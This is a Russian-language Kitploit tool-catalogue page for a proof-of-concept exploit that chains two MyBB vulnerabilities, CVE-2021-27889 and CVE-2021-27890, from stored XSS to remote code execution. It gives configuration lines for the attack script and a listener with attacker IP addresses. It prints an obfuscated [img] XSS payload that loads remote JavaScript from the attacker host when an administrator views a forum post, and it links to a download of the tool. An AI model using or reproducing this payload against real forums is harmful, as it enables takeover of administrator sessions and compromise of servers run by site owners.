Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Mybb-XSS_SQL_RCE-POC — Mybb связывает CVE-2021-27890 и CVE-2021-27889 с RCE poc | Kitploit
Инструменты/GitHubGitHub/xiaopan233/mybb-xss_sql_rce-poc
Генерация полезной нагрузкиЭксплуатацияЭксплуатация веб-приложений
GitHubxiaopan233/mybb-xss_sql_rce-poc

Mybb-XSS_SQL_RCE-POC

Mybb связывает CVE-2021-27890 и CVE-2021-27889 с RCE poc

Репозиторий
1025 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Mybb-XSS_SQL_RCE-POC

Mybb связывает CVE-2021-27890 и CVE-2021-27889 с RCE PoC

Перед использованием:

Здесь два файла: 1.js и attack_listen.py

Вам нужно изменить эти два файла:

1.js:

измените URL форума MyBB и URL атаки:

root@kitploit:~
var bashurl = 'http://192.168.92.164/mybb/mybb-mybb_1825' #mybb forum url
var attack_url = 'http://192.168.92.165:8080/attack_success' #change the attack machine ip.should keep the same with the attack_listen.py

attack_listen.py

измените хост и порт атаки:

root@kitploit:~
attack_host = '192.168.92.165'
attack_port = 8080

Использование:

CVE-2021-27889 — это XSS. Перед выполнением атаки внедрите следующий payload в «Новую тему», «Ответ» или «Личные сообщения». В этой демонстрации я отправляю payload в «Новую тему».

обратите внимание, что 192.168.92.165 — это IP сервера злоумышленника, измените его.

root@kitploit:~
[img]http://evil.com/xx(http://evil.com/onerror=xs1=String.fromCharCode(47);xa1=document.createElement(/script/.source);xa1.src=xs1+xs1+/192.168.92.165/.source+xs1+/1.js/.source;document.getElementById(/header/.source).append(xa1);//[/img]


Теперь наш вредоносный JS 1.js успешно внедрён. Затем мы ждём, пока администратор просмотрит этот пост, будучи залогиненным в админке.

Обратите внимание: администратору не обязательно быть залогиненным на странице форума.


В ожидании мы должны запустить «attack_listen.py» на нашей атакующей машине, чтобы определить, атакован ли администратор.

root@kitploit:~
python3 attack_listen.py

Когда администратор просмотрит вредоносный пост, вредоносный JS выполнит атаку:


Мы можем получить информацию на нашей атакующей машине:

Скачать инструмент